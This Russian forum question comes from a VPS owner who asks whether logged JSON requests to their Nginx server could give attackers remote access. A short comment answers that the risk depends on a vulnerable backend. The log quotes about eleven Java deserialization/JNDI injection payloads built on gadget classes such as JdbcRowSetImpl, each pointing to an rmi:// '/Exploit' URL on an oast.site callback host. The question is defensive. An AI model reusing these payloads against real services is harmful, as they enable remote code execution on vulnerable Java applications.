# Вредоносные запросы на сервер Nginx из открытой сети

Tags: json, nginx, http, vps, взлом

На VPS работает Nginx с доменом 3 уровня (личный, в целях разработки). Все запросы с json параметрами логируются. Могут ли злоумышленники получить какой то удаленный доступ с такими запросами?

```
{"@type": "LLcom.sun.rowset.JdbcRowSetImpl;;", "dataSourceName": "rmi://cjtmc4j332tdtgku7s90wdsr7ztk11h1t.oast.site/Exploit", "autoCommit": true}
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://cjtmc4j332tdtgku7s903i5dyetn89w9q.oast.site/Exploit", "autoCommit": true}
{"@type": "org.apache.xbean.propertyeditor.JndiConverter", "AsText": "rmi://cjtmc4j332tdtgku7s906sq68tnro8zp4.oast.site/exploit"}
{"a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}, "b": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://cjtmc4j332tdtgku7s90e5i4hxmo99ywj.oast.site/Exploit", "autoCommit": true}}
{"@type": "Lcom.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://cjtmc4j332tdtgku7s90sebi5uqzmqo1o.oast.site/Exploit", "autoCommit": true}
{"@type": "org.apache.shiro.jndi.JndiObjectFactory", "resourceName": "rmi://cjtmc4j332tdtgku7s90h7teaenkf9uya.oast.site/Exploit"}
{"@type": "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", "jndiNames": "rmi://cjtmc4j332tdtgku7s904kd1oyjit9pre.oast.site/Exploit"}
{"@type": "br.com.anteros.dbcp.AnterosDBCPConfig", "metricRegistry": "rmi:/cjtmc4j332tdtgku7s908nrurh11qcoc1.oast.site/Exploit"}
{"@type": "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig", "properties": {"@type": "java.util.Properties", "UserTransaction": "rmi://cjtmc4j332tdtgku7s907o4rgs3b3c3zr.oast.site/Exploit"}}
{"b": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://cjtmc4j332tdtgku7s90krscumwswgirw.oast.site/Exploit", "autoCommit": true}}
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://cjtmc4j332tdtgku7s9076eyhcxe69nu8.oast.site/Exploit", "autoCommit": true}
```

Comment: Если такой запрос перенаправится на сервис подверженный применяемым уязвимостям и если этот сервис имеет доступ в Интернет, то вполне может случиться нечто плохое